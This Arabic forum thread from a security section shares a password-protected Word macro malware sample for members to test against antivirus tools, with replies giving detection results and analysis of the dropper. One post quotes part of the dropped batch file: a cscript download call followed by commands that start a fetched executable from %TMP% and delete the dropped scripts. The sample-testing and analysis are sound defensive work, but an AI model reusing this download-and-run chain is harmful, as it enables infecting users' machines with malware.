عـيـنة عينة خطيرة من نوع Macro ... لتجربة الاعضاء

Abdulmuhaimen · 3 مارس 2016

السلام عليكم ورحمة الله وبركاته

أخواني أعضاء منتدى زيزوووم الغالي

بعد غياب لفترة ليست بالقصيرة

, عدنا مجدداً بعينة خبيثة من نوع

Word File تحتوي على فايروس خبيث من نوع Macro

رابط العينة

[hide]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]

كلمة المرور

[hide]infected[/hide]

بانتظار تجارب الاعضاء

:: تحياتي ::

MagicianMiDo32 · 3 مارس 2016

وعليكم السلام ورحمة الله وبركاته أخي جاري فحصها

كنت أعد واحدة مثلها للشباب

MagicianMiDo32 · 4 مارس 2016

بعد الفحص وجدت أن الملف لن يعمل سوى على ويندوز أكس بي
لن يعمل على أوفيس 2013

الماكرو مغلقة بباسوورد لكن بشكل غريب لابد من تشغيلها يدويا لكنها لاتفك نفسها

ود

tiktoshi · 4 مارس 2016

نود قام بتنظيف الملف بمجرد فك الضغط

scan_446236.doc » MIME » part003.bin - VBA/TrojanDropper.Agent.FY trojan

Abdulmuhaimen · 4 مارس 2016

MagicianMiDo32 قال:
بعد الفحص وجدت أن الملف لن يعمل سوى على ويندوز أكس بي
لن يعمل على أوفيس 2013

الماكرو مغلقة بباسوورد لكن بشكل غريب لابد من تشغيلها يدويا لكنها لاتفك نفسها

ود

بالفعل الماكرو Macro يعمل بشكل يدوي ( ربما يعود ذلك بسبب إن الحالة الافتراضية للماكرو غير مفعل )

أما بخصوص أنه لا يعمل الا على نظام التشغيل Windows XP فالماكرو أشتغل عندي على

Windows 10 , Microsoft Office 2016

Abdulmuhaimen · 4 مارس 2016

tiktoshi قال:
نود قام بتنظيف الملف بمجرد فك الضغط

scan_446236.doc » MIME » part003.bin - VBA/TrojanDropper.Agent.FY trojan

أجل أعلم ذلك فهذا التهديد ظهر تحديداً يوم 2016/03/02

لكن الذي لم أعرفه هو إنك تستعمل برمجيات شركة ESET

فهل تركت معشوقك الافيرا AVIRA

tiktoshi · 4 مارس 2016

Abdulmuhaimen قال:
أجل أعلم ذلك فهذا التهديد ظهر تحديداً يوم 2016/03/02

لكن الذي لم أعرفه هو إنك تستعمل برمجيات شركة ESET

فهل تركت معشوقك الافيرا AVIRA

iههههههههههههههههه

عندي جهزين واحد افيرا مواصفاته عالية و واحد ايست اصدار 8 مواصفاته ضعيفة

اول برنامج استخدمته افيرا ثم افاست اصدار 4 الازرق ثم ايست اتركه ثم ارجع اليه لكن افيرا لا يفارقني

لكن الغبي فيهم هو افاست

MagicianMiDo32 · 4 مارس 2016

Abdulmuhaimen قال:
بالفعل الماكرو Macro يعمل بشكل يدوي ( ربما يعود ذلك بسبب إن الحالة الافتراضية للماكرو غير مفعل )

أما بخصوص أنه لا يعمل الا على نظام التشغيل Windows XP فالماكرو أشتغل عندي على

Windows 10 , Microsoft Office 2016

ممكن لان نظامي 64 بت

ان شاء الله سأعاود النظر للملف أنا استخدم اوفيس 2013

Abdulmuhaimen · 4 مارس 2016

MagicianMiDo32 قال:
ممكن لان نظامي 64 بت

ان شاء الله سأعاود النظر للملف أنا استخدم اوفيس 2013

وأنا أيضا نظامي 64Bit

تمت التجربه بأستثناء الملف ... ( المقصود بها أستثناء الملف من الفحص في الوقت الحقيقي )

بعد تشغيل الملف بلحظات ظهرت الرسالة التالية

وهذا جزء بسيط من التجربة

:: تحياتي ::

الاعصار الابيض · 4 مارس 2016

وعليكم السلام ورحمة الله وبركاته

نتيجة المكافي

بمجرد فك الضغط لا شي

بالفحص

وشكرآآآ لك اخي ع جلب العينة

MagicianMiDo32 · 4 مارس 2016

Abdulmuhaimen قال:
وأنا أيضا نظامي 64Bit

تمت التجربه بأستثناء الملف ... ( المقصود بها أستثناء الملف من الفحص في الوقت الحقيقي )

بعد تشغيل الملف بلحظات ظهرت الرسالة التالية

وهذا جزء بسيط من التجربة

:: تحياتي ::

واضح انه ماكرو من نوع dropper يقوم بتنزيل ملف البات ثم تشغيله
الماكرو يكتب بلغة الفيجوال بيسيك VBA

الماكرو العادي الذي أعرفه يقوم بتنفيذ أوامرpowersell مباشرة لكن هذا الأخ هنا نزل ملف البات بأكمله في الtemp
يعتبر حرق الملف لانه لو كان نفذه من برنامج الورد نفسه لكان تخطى حمايات كثيرة لكنه استخرجه في التمب ليس أكثر
كأنه ملف بات فقط ليس ماكرو

==

عندما احاول فتح سورس الماكرو من ادوات المطور في الورد يطلب مني باسوورد
جربت برامج كثيرة لكسر الباسوورد لكن جميعها لم ينجح ,, يقول unknow file format

جربت كذلك البحث عن وسم هاش الباسوورد passwordhash\*وحذفه لحذف الباسوورد لكن لم اجده في الملف الأصلي بعد تعديله لصيغة RTF او بالهيكس
لم أشغل الملف على جهازي الحقيقي لا أملك برنامج حماية جربته فالساندبوكس لكنه لم يعمل لسبب ما قمت بتشغيله مجددا واستطعت استخراج الملفات والحد لله

لكن للأسف لم أتمكن من كسر الباسوورد

وجاري التحليل

أبو رمش · 4 مارس 2016

ألف شكر لك
الأفاست ..

MagicianMiDo32 · 4 مارس 2016

ملف البات

مجموعة أوامر للتمويه ليس إلا ثم هذا الامر

[hide]
cscript //Nologo %DLOAD_SCRIPT%

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

%TMP%\dsdsfvvb.exe & start %TMP%\dsdsfvvb.exe & del %TMP%\ytredasdf1.vbs & del %TMP%\tdfvhjdsf1.bat

لتحميل ملفات من النت

[/hide]

السكربت خاص بعمل HTTP Request
و Network Stream

لتحميل السيرفر الأصلي
,وشكرا لأخي عبد المهيمن على العينة القوية والجميلة

أبو رمش قال:
ألف شكر لك
الأفاست ..
مشاهدة المرفق 109278

يا أهلا ياسهلا

كيفك ياغال شرفت ونورت

مفتقدينك كثير في القسم

أبو رمش · 4 مارس 2016

هلا وغلا النور نوركم يا غالي ............

زيزوومي VIP

توقيع : Abdulmuhaimen

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

(خبراء زيزووم)

توقيع : tiktoshitiktoshi is verified member.

زيزوومي VIP

توقيع : Abdulmuhaimen

زيزوومي VIP

توقيع : Abdulmuhaimen

(خبراء زيزووم)

توقيع : tiktoshitiktoshi is verified member.

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

زيزوومي VIP

توقيع : Abdulmuhaimen

مراقب عام (خبراء زيزووم)

توقيع : الاعصار الابيضالاعصار الابيض is verified member.

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

.: خبير نقاشات الحماية :.

توقيع : أبو رمش

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

.: خبير نقاشات الحماية :.

توقيع : أبو رمش

توقيع : tiktoshi

توقيع : tiktoshi

توقيع : الاعصار الابيض